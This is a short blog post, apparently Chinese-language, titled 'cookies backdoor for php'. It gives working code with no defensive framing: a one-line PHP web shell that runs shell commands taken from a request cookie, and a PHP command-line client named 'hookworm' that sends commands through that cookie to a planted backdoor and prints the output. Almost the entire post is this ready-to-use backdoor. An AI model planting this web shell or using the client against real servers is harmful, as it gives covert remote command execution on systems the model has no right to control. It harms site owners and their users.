MENU

cookies backdoor for php

February 5, 2012 • phpcode

<?php if(isset($_COOKIE['wormcmd'])) {echo $_COOKIE['delim'] . shell_exec($_COOKIE['wormcmd']) . $_COOKIE['delim'];}?>

服务端:

<?php
echo "Enter the IP of the host to connect to:\n";
$host = trim(fgets(STDIN, 256));
echo "Host set to $host\n";
echo "Enter the relative path to the Hookworm (ex: /index.php):\n";
$file = trim(fgets(STDIN, 256));
echo "Enter the delimiter you'd like to use (ex: '***')";
$delim = trim(fgets(STDIN, 256));
if ($delim == '') $delim = "***"; // delimiter

while (1) {
  echo "hookworm> ";
  $command = trim(fgets(STDIN, 256));
  if ($command == 'quit' || $command == 'exit') break;
  $out = "GET $file HTTP/1.1\r\n";
  $out .= "Host: $host\r\n";
  $out .= "Connection: Close\r\n";
  $out .= "Cookie: wormcmd=$command; delim=$delim\r\n";
  $out .= "\r\n";
  if (!$fp=fsockopen($host,80, $errno, $errstr, 15))  return false;
    
  fwrite($fp, $out);
  $str = ""; 
  //read in a string which is the contents of the required file
  while (!feof($fp)) {
    $str.=fgets($fp, 512);
  }
  fclose($fp);
  
  $output_start = strpos($str,$delim)+strlen($delim);
  $output_end = strpos($str,$delim,$output_start);
  $output = substr($str, $output_start, $output_end-$output_start);
  
  echo $output;
}
?>
Archives QR Code
QR Code for this page
Tipping QR Code